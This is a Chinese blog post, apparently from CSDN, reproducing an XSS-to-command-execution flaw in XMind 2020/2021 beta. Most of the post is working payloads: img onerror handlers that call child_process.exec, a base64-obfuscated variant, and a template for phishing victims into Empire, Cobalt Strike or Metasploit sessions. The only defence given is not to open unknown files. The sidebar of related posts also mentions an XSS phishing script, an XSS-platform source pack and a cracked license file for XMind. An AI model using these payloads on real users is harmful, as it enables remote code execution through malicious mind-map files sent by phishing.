XMind 2020/2021 beat版本xss漏洞复现

最新推荐文章于 2023-07-31 11:52:40 发布
最新推荐文章于 2023-07-31 11:52:40 发布
阅读量619 收藏 1
点赞数
分类专栏: 各种漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yangbz123/article/details/116672343
版权

XMind概述

XMind 是一款非常实用的商业思维导图软件,应用全球最先进的Eclipse RCP 软件架构,全力打造易用、高效的可视化思维软件,强调软件的可扩展、跨平台、稳定性和性能,致力于使用先进的软件技术帮助用户真正意义上提高生产率。

漏洞利用

##证明xss payload
<img src=x onerror=alert(/hack/)>
##代码执行payload
require('child_process').exec('systeminfo',(error, stdout, stderr)=>{
   alert(`stdout: ${stdout}`);
  });
##利用payload
<img src=x onerror="const exec = require('child_process').exec('systeminfo',(error, stdout, stderr)=>{alert(`stdout: ${stdout}`);});">
##通过对payload base64加密利用
<img src=x onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2lwY29uZmlnIC9hbGwnLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsKICB9KTs=`,`base64`).toString())'>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

钓鱼上线Empire

###上线payload
<img src=x onerror="const exec = require('child_process').exec('这里powershell脚本',(error, stdout, stderr)=>{alert(`stdout: ${stdout}`);});">

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
钓鱼上线cs
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

钓鱼上线MSF
在这里插入图片描述

修补建议

不要随意下载陌生xmind文件,不要随意点击文件。

END!!!

bye_X
关注
专栏目录
xmind漏洞
qq_23690313的博客
12-14 2675
XMind 目录 一、 项目概要 1 二、 测试过程 1 (一) 制定实施方案: 1 (二) 风险规避: 1 (三) 测试过程: 2 (四) 整改加固建议: 4 三、 渗透测试方法 5 (一) RCE漏洞 5 (二) Cobalt Strike 5 四、 渗透测试范围 6 一、项目概要 (一)项目背景:2021年5月10日,360漏洞云监测到Xmind 2020存在XSS漏洞,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害。 (二)实验目标:主要通过渗透测试的方式,发现和总结
XMind漏洞xss复现(最全payload图文教程)
weixin_51387754的博客
05-18 414
https://mp.weixin.qq.com/s/gunmk1ox62sg2ifmVLFy7A
xmind2020xss漏洞复现
m0_46171781的博客
05-10 513
今天看到某数字漏洞平台公布的xmind漏洞,尝试复现一下 一、复现环境 使用软件为xmind2020版本,可以在xmind官网(https://www.xmind.cn/)进行下载 二、复现过程 1.创建一个思维导图,内容中写入payload 2.进入大纲选项,选中内容按功能键,如ctrl键 3.进一步利用漏洞(payload来自于https://mp.weixin.qq.com/s/NjrycY4TxEz_vV83prNBzw),成功弹出计算器 payload如下: <img src=x on
漏洞复现XMind20202021beta版本存在xss漏洞导致任意代码执行
Kris__zhang的博客
05-11 2019
简介 XMind是一种功能齐全的思维导图和头脑风暴工具,旨在产生想法,激发创造力,并在工作和生活中带来效率。数以百万计的用户们喜欢它 漏洞xssXMind20202021beta版本存在xss漏洞导致任意代码执行,可直接拿到目标主机权限 下载 官方连接: https://www.xmind.cn/download/ https://www.xmind.cn/xmind2021/beta/ 漏洞复现 XMind2020xss】 payload:<audio src=x onerror=co
Xmind 2020 XSS漏洞导致命令执行漏洞复现
Jaky5320的博客
05-10 305
0x00简介:       XMind是一个挺不错的思维导图软件,某数字漏洞云公众号在今天2021-05-10 10:22:29发布了漏洞预警信息,我立马找复现环境。下载地址:https://www.xmind.cn/0x01:复现:环境:1、XSS复现2、命令执行漏洞复现:0x02:预防:       1、升级到最新版本    2、谨慎打开Xmind &nb
Xmind2020存在XSS导致命令执行漏洞复现
m0_48520508的博客
05-19 515
0x00介绍 XMind 是一款非常实用的商业思维导图软件,应用全球最先进的Eclipse RCP 软件架构,全力打造易用、高效的可视化思维软件,强调软件的可扩展、跨平台、稳定性和性能,致力于使用先进的软件技术帮助用户真正意义上提高生产率。 0x01漏洞概述 该漏洞可以花样构造相关参数,执行系统命令,获取用户权限,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害 0x02影响版本 Xmind 2020 0x03环境搭建 1、下载漏洞环境,使用软件为xmind2020版本,可自.
XMind 2020 for mac app.asar文件
09-19
对于标签“Xmind mac 2020”,这意味着这个`app.asar`文件是针对XMind 2020 mac版的,因此其内部结构和功能将与XMind的其他版本或非macOS版本有所不同,可能包含针对macOS系统的优化和特性。 总的来说,`app.asar` ...
XMind ZEN/8思维导图就该这样学
06-16
★介绍全平台思维导图软件XMind的两个不同版本,即XMind ZEN和XMind 8(包含专业版内容),全面实际操作,结合生活和工作中的实战案例,无基础者从零无痛入门,有基础者可将案例拿来就用。★ 学以致用人生致胜:学会...
XMind 2020 xss漏洞导致远程代码执行
jelly
05-14 501
0x00 简介 2021年5月10日,360漏洞云监测到Xmind 2020存在XSS漏洞,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害。 影响版本XMind 2020/2021 beat版本 0x01 复现环境 系统:普通的 win10 XMind 版本XMind-2021-for-Windows-64bit-11.0.0-Beta1-202105061920 此外还测试了 XMind 2020 windows和macOS 版本均存在该漏洞复现记录时间:2021
最新!Xmind2020安装教程
qq_43034505的博客
12-24 2万+
xmind2020安装 进入xmind官网,选择xmind2020,点击免费下载。 https://www.xmind.cn/xmind2020/ 等待下载结束之后,双击可执行文件,一路无脑安装即可 激活 下载网盘中的app.asar文件 链接:https://pan.baidu.com/s/17a4lIznFX1rjT5xlr1V0hA 提取码:ghdq 找到xmind安装目录下的resource目录,将app.asar文件改为app.asar.bak,之后将下载好的.
2020年最新版本_XSS平台源码_超强版.rar
05-08
2020年最新版本_XSS平台源码_超强版
xmind右键解决.reg
05-23
本注册表文件可以解决安装完后xmind右键无法新建文件问题
Django_debug_page_XSS漏洞 CVE-2017-12794 漏洞复现
ADummy的博客
02-22 331
Django debug page XSS漏洞(CVE-2017-12794) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>用户创建成功—>成功登录 0x01漏洞介绍 ​ Django默认配置下,如果匹配上的URL路由中最后一位是/,而用户访问的时候没加/,Django默认会跳转到带/的请求中。(由配置项中的django.middleware.common.CommonMiddleware、APPEND_SLASH来决定)。在path开头为//example.
完成xss漏洞利用-XSS钓鱼实验
weixin_43696861的博客
04-25 607
一、钓鱼脚本 fish.php <?php error_reporting(0); // var_dump($_SERVER); if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) { //发送认证框,并给出迷惑性的info header('Content-type:t...
XMind (2021)新增演说模式
Mac_mimi的博客
07-22 3089
Xmind 是一款实用的商业思维导图软件,致力于使用先进的软件技术帮助用户真正意义上提高生产率。它的界面比同类型的 FreeMind要美观很多,绘制出的思维导图也更加漂亮,功能也更加丰富,最近这款应用的更新,又把思考工具的可能性拓展了一大步。 xmind 2020中文版是一款十分实用的思维导图软件。相信很多用户都还不了解XMindXMind官方版优化了许多功能,性能上大大提高。使用XMind思维导图可以帮助用户完成逻辑图、树形图、组织结构图等,还可以导出ppt、word、图片、pdf等众多格式。 Tab
lingo变量无限制版本_XMind 2020 (10.1.2) 全平台使用无限制win版本
weixin_39738115的博客
11-27 473
软件介绍XMind ZEN是一款有颜值的思维导图软件,新版本的软件界面比起老版本好看多了。XMind 是一个全功能的思维导图和头脑风暴软件,为激发灵感和创意而生。作为一款有效提升工作和生活效率的生产力工具,受到全球百千万用户的青睐。安装教程1根据自己的系统选择,并双击安装即可2安装过程全自动,无法更改安装路径3成功以后,不要打开软件4选择对应位数补丁,右键复制将文件app.asar文件5...
xmind过期了重新安装方式
mys328的专栏
07-31 591
最近XMind过期了或者打不开需要重新安装,可参考以下安装方式:https://www.kxdw.com/soft/45604.html。工作中经常需要用到花脑图的工具,比较出的xmind很强大。需需要安装包的朋友可以私信。
XMind突然启动不了解决方法
热门推荐
枫。晨夕的专栏
03-19 3万+
现象:用得好好的XMind突然怎么也启动不了,具体原因不知,从网上搜了好些方法,以下方法解决问题 问题解决:   1、右击XMind打开属性,找到XMind安装包的位置,或者你直接打开XMind安装包文件夹。   2、用记事本打开两个文件:“XMind.ini”和“XMind-original.ini”。   3、将两个文件的Application Data改为“AppData/Roa...
xmind2020安装目录
最新发布
09-16
XMind 2020的安装目录是用户选择安装XMind 2020时所指定的目录。在安装XMind 2020之前,用户需要下载安装程序,并运行该程序。运行程序后,用户将看到一个安装向导,该向导将引导用户完成XMind 2020的安装过程。 在安装向导中,用户将被要求接受许可协议,并选择XMind 2020的安装目录。用户可以选择将XMind 2020安装在默认目录中,也可以选择将其安装在自定义的目录中。默认情况下,XMind 2020的安装目录通常是“C:\Program Files\XMind 2020”。 用户还可以选择安装XMind 2020的语言版本和其他附加组件。一旦用户完成了所有选项的选择,他们可以点击“安装”按钮,开始安装XMind 2020。安装过程可能需要一些时间,具体取决于用户计算机的性能和网络速度。 一旦安装完成,用户可以在他们选择的安装目录中找到XMind 2020的可执行文件和其他关联文件。用户可以通过双击可执行文件来启动XMind 2020,并开始使用它进行思维导图、计划和组织等各种工作。需要注意的是,在某些情况下,用户可能需要以管理员身份运行XMind 2020,才能正常使用某些功能或访问系统文件等。 总之,XMind 2020的安装目录是用户在安装过程中选择的目录,它可以是默认目录,也可以是用户自定义的目录。无论选择什么安装目录,用户都可以在安装完成后找到XMind 2020的相关文件,并开始使用它。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值